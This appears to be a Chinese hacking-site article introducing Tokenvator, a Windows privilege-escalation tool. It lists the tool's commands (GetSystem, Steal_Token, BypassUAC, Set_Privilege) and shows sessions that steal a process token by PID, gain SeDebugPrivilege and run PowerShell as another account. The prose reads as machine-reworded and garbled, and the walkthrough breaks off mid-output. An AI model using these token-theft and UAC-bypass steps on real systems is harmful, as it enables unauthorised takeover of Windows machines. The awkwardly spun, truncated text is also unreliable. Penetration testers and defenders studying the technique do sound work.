如何使用Tokenvator和Windows Tokens实现提权

黑客软件hacker2018-06-12 19:10:539573A⁺A^-

"今日给大伙儿详细介绍的是这款全名是Tokenvator的专用工具，该专用工具选用.NET开发设计，可用以在Windows系统软件中提权。

如何使用Tokenvator和Windows Tokens实现提权第1张

专用工具免费下载

下载链接：【GitHub传送门】

基础应用

Tokenvator能够立即在互动式终端设备中运作，主要的运行命令可以以命令行参数的方式出示。在互交方式下，能够用tab键补齐指令，或双击鼠标tab键获得协助信息内容。

C:\Users\badjuju>Tokenvator.exe

(Tokens)> help

Name Optional Required

---- -------- --------

GetSystem Command -

GetTrustedInstaller Command -

Steal_Token Command ProcessID

BypassUAC ProcessID Command

List_Privileges ProcessID -

Set_Privilege ProcessID Privilege

List_Processes - -

List_Processes_WMI - -

Find_User_Processes - User

Find_User_Processes_WMI - User

List_User_Sessions - -

WhoAmI - -

RevertToSelf - -

Run - Command

(Tokens)> WhoAmI

Name Optional Required

---- -------- --------

WhoAmI - -

(Tokens)> WhoAmI

[*]Operating as LAB\badjuju

下边绝大多数截屏显示信息的是在互交方式下的指令运作状况：

Steal_Token

从最基础的作用而言，Tokenvator能够用于浏览并改动Windows验证令牌，以便获得到特殊系统进程的令牌，人们必须融合总体目标系统进程的PID来运作Steal_Token指令。

(Tokens)> Steal_Token Name Optional Required ---- -------- -------- Steal_Token Command ProcessID

(Tokens)> Steal_Token 7384 [*]Adjusting Token Privilege [+]Received luid [*]AdjustTokenPrivilege [+]Adjusted Token To: SeDebugPrivilege [*]Impersonating 7384 [+]Recieved Handle For: (7384) [+]Process Handle: 824 [+]Primary Token Handle: 828 [+]Duplicate Token Handle: 824

(Tokens)> whoami [*]Operating as lab\backup

或是人们还可以加上附加的指令选择项来应用新的浏览令牌。

(Tokens)> Steal_Token 7384 powershell.exe [*]Adjusting Token Privilege [+]Rece

点击这里复制本文地址以上内容由黑资讯整理呈现，请务必在转载分享时注明本文地址！如对内容有疑问，请联系我们，谢谢！